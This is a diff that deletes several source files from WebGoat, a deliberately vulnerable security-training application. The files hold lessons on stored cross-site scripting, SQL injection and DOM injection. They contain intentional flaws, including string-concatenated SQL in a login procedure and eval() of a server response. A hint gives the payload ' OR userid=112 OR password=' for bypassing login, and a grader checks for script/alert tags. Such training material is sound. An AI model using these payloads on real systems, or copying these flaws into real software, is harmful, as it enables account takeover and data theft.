-                    instructions += "Use the provided user-defined function RegexMatch to test the data against a pattern. ";
-                instructions += "A sample regular expression pattern: ^[a-zA-Z0-9,\\. ]{0,80}$ "
-                        + "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
-            }
-        }
-
-        return instructions;
-
-    }
-
-    @Override
-    public String[] getStages()
-    {
-        if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 };
-        return new String[] { STAGE1 };
-    }
-
-    public void handleRequest(WebSession s)
-    {
-        if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
-        String requestedActionName = null;
-        try
-        {
-            requestedActionName = s.getParser().getStringParameter("action");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // Let them eat login page.
-            requestedActionName = LOGIN_ACTION;
-        }
-
-        if (requestedActionName != null)
-        {
-            try
-            {
-                LessonAction action = getAction(requestedActionName);
-
-                if (action != null)
-                {
-                    if (!action.requiresAuthentication() || action.isAuthenticated(s))
-                    {
-                        action.handleRequest(s);
-                        // setCurrentAction(s, action.getNextPage(s));
-                    }
-                }
-                else
-                {
-                    setCurrentAction(s, ERROR_ACTION);
-                }
-            } catch (ParameterNotFoundException pnfe)
-            {
-                // System.out.println("Missing parameter");
-                pnfe.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (ValidationException ve)
-            {
-                // System.out.println("Validation failed");
-                ve.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (UnauthenticatedException ue)
-            {
-                s.setMessage("Login failed");
-                // System.out.println("Authentication failure");
-                ue.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                s.setMessage("You are not authorized to perform this function");
-                // System.out.println("Authorization failure");
-                ue2.printStackTrace();
-            } catch (Exception e)
-            {
-                // All other errors send the user to the generic error page
-                // System.out.println("handleRequest() error");
-                e.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            }
-        }
-
-        // All this does for this lesson is ensure that a non-null content exists.
-        setContent(new ElementContainer());
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the CrossSiteScripting object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "LAB: DB Cross Site Scripting (XSS)";
-    }
-
-    @Override
-    protected boolean getDefaultHidden()
-    {
-        String driver = getWebgoatContext().getDatabaseDriver();
-        boolean hidden = !(driver.contains("oracle") || driver.contains("jtds"));
-        return hidden;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java

@@ -1,225 +0,0 @@
-
-package org.owasp.webgoat.lessons.DBCrossSiteScripting;
-
-import java.sql.CallableStatement;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import javax.servlet.http.HttpServletRequest;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class UpdateProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
-
-            HttpServletRequest request = s.getRequest();
-            int subjectId = Integer.parseInt(request.getParameter(DBCrossSiteScripting.EMPLOYEE_ID));
-            String firstName = request.getParameter(DBCrossSiteScripting.FIRST_NAME);
-            String lastName = request.getParameter(DBCrossSiteScripting.LAST_NAME);
-            String ssn = request.getParameter(DBCrossSiteScripting.SSN);
-            String title = request.getParameter(DBCrossSiteScripting.TITLE);
-            String phone = request.getParameter(DBCrossSiteScripting.PHONE_NUMBER);
-            String address1 = request.getParameter(DBCrossSiteScripting.ADDRESS1);
-            String address2 = request.getParameter(DBCrossSiteScripting.ADDRESS2);
-            int manager = Integer.parseInt(request.getParameter(DBCrossSiteScripting.MANAGER));
-            String startDate = request.getParameter(DBCrossSiteScripting.START_DATE);
-            int salary = Integer.parseInt(request.getParameter(DBCrossSiteScripting.SALARY));
-            String ccn = request.getParameter(DBCrossSiteScripting.CCN);
-            int ccnLimit = Integer.parseInt(request.getParameter(DBCrossSiteScripting.CCN_LIMIT));
-            String disciplinaryActionDate = request.getParameter(DBCrossSiteScripting.DISCIPLINARY_DATE);
-            String disciplinaryActionNotes = request.getParameter(DBCrossSiteScripting.DISCIPLINARY_NOTES);
-            String personalDescription = request.getParameter(DBCrossSiteScripting.DESCRIPTION);
-
-            Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
-                    manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-                    personalDescription);
-
-            try
-            {
-                if (subjectId > 0)
-                {
-                    this.changeEmployeeProfile(s, userId, subjectId, employee);
-                    setRequestAttribute(s, getLessonName() + "." + DBCrossSiteScripting.EMPLOYEE_ID, Integer
-                            .toString(subjectId));
-                    if (DBCrossSiteScripting.STAGE1.equals(getStage(s)))
-                    {
-                        address1 = address1.toLowerCase();
-                        boolean pass = address1.contains("<script>");
-                        pass &= address1.contains("alert");
-                        pass &= address1.contains("</script>");
-                        if (pass)
-                        {
-                            setStageComplete(s, DBCrossSiteScripting.STAGE1);
-                        }
-                    }
-                }
-                else
-                    this.createEmployeeProfile(s, userId, employee);
-            } catch (SQLException e)
-            {
-                s.setMessage("Error updating employee profile");
-                e.printStackTrace();
-                if (DBCrossSiteScripting.STAGE2.equals(getStage(s))
-                        && (e.getMessage().contains("ORA-06512") || e.getMessage().contains("Illegal characters"))
-                        && !employee.getAddress1().matches("^[a-zA-Z0-9,\\. ]{0,80}$"))
-                {
-                    setStageComplete(s, DBCrossSiteScripting.STAGE2);
-                }
-
-            }
-
-            try
-            {
-                chainedAction.handleRequest(s);
-            } catch (UnauthenticatedException ue1)
-            {
-                // System.out.println("Internal server error");
-                ue1.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                // System.out.println("Internal server error");
-                ue2.printStackTrace();
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return DBCrossSiteScripting.VIEWPROFILE_ACTION;
-    }
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) throws SQLException
-        {
-            String update = " { CALL UPDATE_EMPLOYEE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) }";
-            CallableStatement call = WebSession.getConnection(s).prepareCall(update);
-            // Note: The password field is ONLY set by ChangePassword
-            call.setInt(1, userId);
-            call.setString(2, employee.getFirstName());
-            call.setString(3, employee.getLastName());
-            call.setString(4, employee.getSsn());
-            call.setString(5, employee.getTitle());
-            call.setString(6, employee.getPhoneNumber());
-            call.setString(7, employee.getAddress1());
-            call.setString(8, employee.getAddress2());
-            call.setInt(9, employee.getManager());
-            call.setString(10, employee.getStartDate());
-            call.setInt(11, employee.getSalary());
-            call.setString(12, employee.getCcn());
-            call.setInt(13, employee.getCcnLimit());
-            call.setString(14, employee.getDisciplinaryActionDate());
-            call.setString(15, employee.getDisciplinaryActionNotes());
-            call.setString(16, employee.getPersonalDescription());
-            call.executeUpdate();
-    }
-
-    public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
-    {
-        try
-        {
-            int nextId = getNextUID(s);
-            String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
-
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-                ps.setString(1, employee.getFirstName().toLowerCase());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getDisciplinaryActionDate());
-                ps.setString(13, employee.getDisciplinaryActionNotes());
-                ps.setString(14, employee.getPersonalDescription());
-
-                ps.execute();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    private int getNextUID(WebSession s)
-    {
-        int uid = -1;
-        try
-        {
-            Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                ResultSet.CONCUR_READ_ONLY);
-            ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
-            results.first();
-            uid = results.getInt("uid");
-        } catch (SQLException sqle)
-        {
-            sqle.printStackTrace();
-            s.setMessage("Error updating employee profile");
-        }
-        return uid + 1;
-    }
-}

src/main/java/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java

@@ -1,244 +0,0 @@
-
-package org.owasp.webgoat.lessons.DBSQLInjection;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.ElementContainer;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.EditProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.UpdateProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.ViewProfile;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class DBSQLInjection extends GoatHillsFinancial
-{
-    private final static Integer DEFAULT_RANKING = new Integer(75);
-
-    public final static int PRIZE_EMPLOYEE_ID = 112;
-
-    public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
-
-    public final static String STAGE1 = "String SQL Injection";
-
-    public final static String STAGE2 = "Block SQL Injection using Bind Variables";
-
-    public void registerActions(String className)
-    {
-        registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-        registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-        registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
-        // These actions are special in that they chain to other actions.
-        registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
-        registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
-        registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
-
-    /**
-     * Gets the category attribute of the CrossSiteScripting object
-     * 
-     * @return The category value
-     */
-    public Category getDefaultCategory()
-    {
-        return Category.INJECTION;
-    }
-
-    /**
-     * Gets the hints attribute of the DirectoryScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
-        hints
-                .add("This is the code for the query being built and issued by WebGoat:<br><br> "
-                        + "stmt  := 'SELECT USERID FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';<br>"
-                        + "EXECUTE IMMEDIATE stmt INTO v_userid;");
-        hints
-                .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
-                        + "Remember: You need to end up with a SQL statement that only returns one row, since we are using an INTO clause");
-
-        // Stage 1
-        hints.add("You may need to use OWASP ZAP to remove a field length limit to fit your attack.");
-        hints.add("Try entering a password of [ ' OR userid=112 OR password=' ].");
-
-        // Stage 2
-        hints.add("Change the Stored procedure to use bind variables.");
-
-        return hints;
-    }
-
-    @Override
-    public String[] getStages()
-    {
-        if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 };
-        return new String[] { STAGE1 };
-    }
-
-    /**
-     * Gets the instructions attribute of the ParameterInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (!getLessonTracker(s).getCompleted())
-        {
-            String stage = getStage(s);
-            if (STAGE1.equals(stage))
-            {
-                instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
-                        + "The goal here is to login as the user " + PRIZE_EMPLOYEE_NAME
-                        + ", who is in the Admin group.  "
-                        + "You do not have the password, but the form is SQL injectable. "
-                        + "View the EMPLOYEE_LOGIN stored procedure and see if you can "
-                        + "determine why the exploit exists.";
-            }
-            else if (STAGE2.equals(stage))
-            {
-                instructions = "Stage 2: Use bind variables.<br>"
-                        + "Using the Squirrel SQL Client, update the EMPLOYEE_LOGIN stored procedure in the database "
-                        + "to use bind variables, rather than string concatenation. "
-                        + "Repeat the SQL Injection attack. Verify that the attack is no longer effective.";
-            }
-        }
-
-        return instructions;
-    }
-
-    public void handleRequest(WebSession s)
-    {
-        if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
-        String requestedActionName = null;
-        try
-        {
-            requestedActionName = s.getParser().getStringParameter("action");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // Let them eat login page.
-            requestedActionName = LOGIN_ACTION;
-        }
-
-        if (requestedActionName != null)
-        {
-            try
-            {
-                LessonAction action = getAction(requestedActionName);
-                if (action != null)
-                {
-                    // System.out.println("CrossSiteScripting.handleRequest() dispatching to: " +
-                    // action.getActionName());
-                    if (!action.requiresAuthentication() || action.isAuthenticated(s))
-                    {
-                        action.handleRequest(s);
-                        // setCurrentAction(s, action.getNextPage(s));
-                    }
-                }
-                else
-                    setCurrentAction(s, ERROR_ACTION);
-            } catch (ParameterNotFoundException pnfe)
-            {
-                // System.out.println("Missing parameter");
-                pnfe.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (ValidationException ve)
-            {
-                // System.out.println("Validation failed");
-                ve.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            } catch (UnauthenticatedException ue)
-            {
-                s.setMessage("Login failed");
-                // System.out.println("Authentication failure");
-                ue.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                s.setMessage("You are not authorized to perform this function");
-                // System.out.println("Authorization failure");
-                ue2.printStackTrace();
-            } catch (Exception e)
-            {
-                // All other errors send the user to the generic error page
-                // System.out.println("handleRequest() error");
-                e.printStackTrace();
-                setCurrentAction(s, ERROR_ACTION);
-            }
-        }
-
-        // All this does for this lesson is ensure that a non-null content exists.
-        setContent(new ElementContainer());
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the CrossSiteScripting object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "LAB: DB SQL Injection";
-    }
-
-    @Override
-    protected boolean getDefaultHidden()
-    {
-        String driver = getWebgoatContext().getDatabaseDriver();
-        boolean hidden = !(driver.contains("oracle") || driver.contains("jtds"));
-        return hidden;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/DBSQLInjection/Login.java

@@ -1,226 +0,0 @@
-
-package org.owasp.webgoat.lessons.DBSQLInjection;
-
-import java.sql.CallableStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.sql.Types;
-import java.util.List;
-import java.util.Vector;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.session.EmployeeStub;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class Login extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
-    {
-        // System.out.println("Login.handleRequest()");
-        getLesson().setCurrentAction(s, getActionName());
-
-        List employees = getAllEmployees(s);
-        setSessionAttribute(s, getLessonName() + "." + DBSQLInjection.STAFF_ATTRIBUTE_KEY, employees);
-
-        String employeeId = null;
-        try
-        {
-            employeeId = s.getParser().getStringParameter(DBSQLInjection.EMPLOYEE_ID);
-            String password = s.getParser().getRawParameter(DBSQLInjection.PASSWORD);
-
-            // Attempt authentication
-            boolean authenticated = login(s, employeeId, password);
-
-            if (authenticated)
-            {
-                // Execute the chained Action if authentication succeeded.
-                try
-                {
-                    chainedAction.handleRequest(s);
-                } catch (UnauthenticatedException ue1)
-                {
-                    // System.out.println("Internal server error");
-                    ue1.printStackTrace();
-                } catch (UnauthorizedException ue2)
-                {
-                    // System.out.println("Internal server error");
-                    ue2.printStackTrace();
-                }
-            }
-            else
-                s.setMessage("Login failed");
-
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // No credentials offered, so we log them out
-            setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
-        }
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        String nextPage = DBSQLInjection.LOGIN_ACTION;
-
-        if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s);
-
-        return nextPage;
-
-    }
-
-    public boolean requiresAuthentication()
-    {
-        return false;
-    }
-
-    public boolean login(WebSession s, String userId, String password)
-    {
-        boolean authenticated = false;
-
-        try
-        {
-            String call = "{ ? = call EMPLOYEE_LOGIN(?,?) }"; // NB: "call", not "CALL"! Doh!
-
-            try
-            {
-                CallableStatement statement = WebSession.getConnection(s)
-                        .prepareCall(call, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                statement.registerOutParameter(1, Types.INTEGER);
-                statement.setInt(2, Integer.parseInt(userId));
-                statement.setString(3, password);
-                statement.execute();
-
-                int rows = statement.getInt(1);
-                if (rows > 0)
-                {
-                    setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
-                    setSessionAttribute(s, getLessonName() + "." + DBSQLInjection.USER_ID, userId);
-                    authenticated = true;
-                    if (DBSQLInjection.STAGE1.equals(getStage(s))
-                            && DBSQLInjection.PRIZE_EMPLOYEE_ID == Integer.parseInt(userId))
-                    {
-                        setStageComplete(s, DBSQLInjection.STAGE1);
-                    }
-                }
-                else
-                {
-
-                    if (DBSQLInjection.STAGE2.equals(getStage(s)))
-                    {
-                        try
-                        {
-                            String call2 = "{ ? = call EMPLOYEE_LOGIN_BACKUP(?,?) }";
-                            statement = WebSession.getConnection(s).prepareCall(call2,
-                                                                                ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                ResultSet.CONCUR_READ_ONLY);
-                            statement.registerOutParameter(1, Types.INTEGER);
-                            statement.setInt(2, Integer.parseInt(userId));
-                            statement.setString(3, password);
-                            statement.execute();
-
-                            rows = statement.getInt(1);
-                            if (rows > 0) setStageComplete(s, DBSQLInjection.STAGE2);
-                        } catch (SQLException sqle2)
-                        {
-                        }
-                    }
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error logging in: " + sqle.getLocalizedMessage());
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error logging in: " + e.getLocalizedMessage());
-            e.printStackTrace();
-        }
-
-        // System.out.println("Lesson login result: " + authenticated);
-        return authenticated;
-    }
-
-    public List getAllEmployees(WebSession s)
-    {
-        List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-        // Query the database for all roles the given employee belongs to
-        // Query the database for all employees "owned" by these roles
-
-        try
-        {
-            String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
-                    + "where employee.userid=roles.userid";
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                answer_results.beforeFirst();
-                while (answer_results.next())
-                {
-                    int employeeId = answer_results.getInt("userid");
-                    String firstName = answer_results.getString("first_name");
-                    String lastName = answer_results.getString("last_name");
-                    String role = answer_results.getString("role");
-                    EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
-                    employees.add(stub);
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employees");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employees");
-            e.printStackTrace();
-        }
-
-        return employees;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/DOMInjection.java

@@ -1,194 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.PrintWriter;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * @created October 28, 2006
- */
-
-public class DOMInjection extends LessonAdapter
-{
-
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    private final static String KEY = "key";
-
-    public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-    
-    private final static String key = "K1JFWP8BSO8HI52LNPQS8F5L01N";
-
-    public void handleRequest(WebSession s)
-    {
-        try
-        {
-            String userKey = s.getParser().getRawParameter(KEY, "");
-            String fromAJAX = s.getParser().getRawParameter("from", "");
-            if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0 && userKey.equals(key))
-            {
-                s.getResponse().setContentType("text/html");
-                s.getResponse().setHeader("Cache-Control", "no-cache");
-                PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
-
-                out.print("document.form.SUBMIT.disabled = false;");
-                out.flush();
-                out.close();
-                return;
-            }
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-        Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
-
-        form.addElement(createContent(s));
-
-        setContent(form);
-    }
-
-    protected Element createContent(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        if (s.getRequest().getMethod().equalsIgnoreCase("POST"))
-        {
-            makeSuccess(s);
-        }
-
-        String lineSep = System.getProperty("line.separator");
-        String script = "<script>" + lineSep + "function validate() {" + lineSep
-                + "var keyField = document.getElementById('key');" + lineSep + "var url = '" + getLink()
-                + "&from=ajax&key=' + encodeURIComponent(keyField.value);" + lineSep
-                + "if (typeof XMLHttpRequest != 'undefined') {" + lineSep + "req = new XMLHttpRequest();" + lineSep
-                + "} else if (window.ActiveXObject) {" + lineSep + "req = new ActiveXObject('Microsoft.XMLHTTP');"
-                + lineSep + "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
-                + "   req.onreadystatechange = callback;" + lineSep + "   req.send(null);" + lineSep + "}" + lineSep
-                + "function callback() {" + lineSep + "    if (req.readyState == 4) { " + lineSep
-                + "        if (req.status == 200) { " + lineSep + "            var message = req.responseText;" + lineSep
-                + "    var messageDiv = document.getElementById('MessageDiv');" + lineSep + "  try {" + lineSep
-                + "          eval(message);" + lineSep + "    " + lineSep
-                + "        messageDiv.innerHTML = 'Correct licence Key.' " + lineSep + "      }" + lineSep
-                + "  catch(err)" + lineSep + "  { " + lineSep + "    messageDiv.innerHTML = 'Wrong license key.'"
-                + lineSep + "} " + lineSep + "    }}}" + lineSep + "</script>" + lineSep;
-
-        ec.addElement(new StringElement(script));
-        ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:")));
-        ec.addElement(new BR()
-                .addElement("Please enter the license key that was emailed to you to start using the application."));
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("70%").setAlign("center");
-
-        TR tr = new TR();
-        tr.addElement(new TD(new StringElement("License Key: ")));
-
-        Input input1 = new Input(Input.TEXT, KEY, "");
-        input1.setID(KEY);
-        input1.addAttribute("onkeyup", "validate();");
